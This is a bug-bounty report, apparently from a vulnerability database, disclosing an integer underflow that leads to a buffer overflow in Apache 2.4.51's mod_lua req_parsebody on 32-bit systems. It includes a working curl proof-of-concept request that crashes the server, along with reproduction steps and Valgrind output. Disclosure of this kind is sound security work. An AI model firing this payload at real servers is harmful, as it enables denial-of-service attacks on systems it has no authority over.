ChamalH1:1434056Internet Bug Bounty: Buffer overflow in req_parsebody method in lua_request.c
0.088 Low
EPSS
Percentile
94.6%
Software Versions
Ubuntu - 18.04 (32-bit)
Apache 2.4.51 (32-bit)
Description
This bug is present in “req_parsebody” method of modules/lua/lua_request.c file.
Below mentioned lines of code cause this bug.
...
size_t vlen = 0;
...
...
vlen = end - crlf - 8;
buffer = (char *) apr_pcalloc(r->pool, vlen+1);
memcpy(buffer, crlf + 4, vlen);
...
Above code does not check whether the result of (end - crlf) is greater than or equal to 8.
So it is possible to make the result of (end - crlf - 8), negative.
Sending this HTTP request causes the result to be -1.
curl -v -X POST -H 'content-type: multipart/form-data; boundary=-' --data-binary $'-\r\n\r\naaa-' http://127.0.0.1/test.lua
Since “vlen” is of type “size_t”, -1 will become 4294967295. This is the maximum value of size_t data type in 32 bit systems.
Then vlen+1 is passed to apr_pcalloc method.
So the actual size allocated is 0.
Since the allocated buffer is too small there will be an overflow and crash in next memcpy statement.
Steps to Reproduce
-
Build Apache web server with Lua module
./configure --enable-lua=shared
make
make install -
Enable Lua module with Apache web server.
Add these lines to httpd.conf file.
LoadModule lua_module modules/mod_lua.so
<Files "*.lua">
SetHandler lua-script
</Files>
-
Copy attached F1555487 file to htdocs folder.
-
Start Apache web server in debug single worker mode.
./httpd -X -d /home/apache/install-directory/ -
Send this HTTP request with CURL.
curl -v -X POST -H 'content-type: multipart/form-data; boundary=-' --data-binary $'-\r\n\r\naaa-' http://127.0.0.1/test.lua
Apache web server will crash.
Valgrind Output
Command: valgrind ./httpd -X -d /home/apache/install-directory/
Invalid write of size 1
at 0x483513B: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
by 0x501355B: req_parsebody (lua_request.c:415)
by 0x503628E: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5041A1F: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x50365E5: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5030D96: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5035C1A: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5036886: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5032556: lua_pcallk (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x500D02B: lua_handler (mod_lua.c:323)
by 0x15F9E4: ap_run_handler (config.c:169)
by 0x16040C: ap_invoke_handler (config.c:443)
Address 0x12aec000 is not stack’d, malloc’d or (recently) free’d
Process terminating with default action of signal 11 (SIGSEGV)
Access not within mapped region at address 0x12AEC000
at 0x483513B: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
by 0x501355B: req_parsebody (lua_request.c:415)
by 0x503628E: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5041A1F: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x50365E5: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5030D96: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5035C1A: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5036886: ??? (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x5032556: lua_pcallk (in /usr/lib/i386-linux-gnu/liblua5.2.so.0.0.0)
by 0x500D02B: lua_handler (mod_lua.c:323)
by 0x15F9E4: ap_run_handler (config.c:169)
by 0x16040C: ap_invoke_handler (config.c:443)
Impact
May be possible to use in a denial of service attack.
Related
